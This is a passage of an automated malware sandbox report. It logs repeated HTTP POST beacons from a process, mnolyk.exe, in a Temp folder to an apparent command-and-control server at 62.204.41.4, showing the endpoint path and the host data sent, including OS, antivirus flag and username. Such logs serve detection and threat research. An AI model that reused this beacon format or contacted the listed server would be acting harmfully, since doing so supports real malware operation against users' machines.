                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      177192.168.2.74990362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:43.538749933 CET623OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:43.603050947 CET623INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:43 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      178192.168.2.74990462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:43.781749964 CET624OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:43.847826958 CET624INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:43 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      179192.168.2.74990562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:44.026160002 CET625OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:44.092535973 CET625INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:44 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      18192.168.2.74974262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:01.986509085 CET449OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:02.050532103 CET450INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:02 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      180192.168.2.74990662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:47.288237095 CET626OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:47.353909969 CET626INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:47 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      181192.168.2.74990762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:47.522865057 CET627OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:47.586518049 CET627INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:47 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      182192.168.2.74990862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:47.759181023 CET628OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:47.823967934 CET628INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:47 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      183192.168.2.74990962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:47.991595030 CET629OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:48.057262897 CET629INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:48 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      184192.168.2.74991062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:48.230041981 CET630OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:48.295130014 CET630INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:48 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      185192.168.2.74991162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:48.462366104 CET631OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:48.527606964 CET631INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:48 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      186192.168.2.74991262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:48.704071045 CET632OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:48.767746925 CET632INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:48 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      187192.168.2.74991362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:48.947845936 CET633OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:49.011852980 CET633INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:48 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      188192.168.2.74991462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:49.185767889 CET634OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:49.253202915 CET634INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:49 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      189192.168.2.74991562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:49.430013895 CET635OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:49.494277000 CET635INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:49 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      19192.168.2.74974362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:02.235831976 CET451OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:02.300020933 CET451INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:02 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      190192.168.2.74991662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:49.663084984 CET636OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:49.726577997 CET636INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:49 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      191192.168.2.74991762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:49.905139923 CET637OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:49.969903946 CET637INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:49 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      192192.168.2.74991862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:50.149977922 CET638OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:50.215410948 CET638INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:50 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      193192.168.2.74991962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:50.383743048 CET639OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:50.448525906 CET639INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:50 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      194192.168.2.74992062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:50.617007971 CET640OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
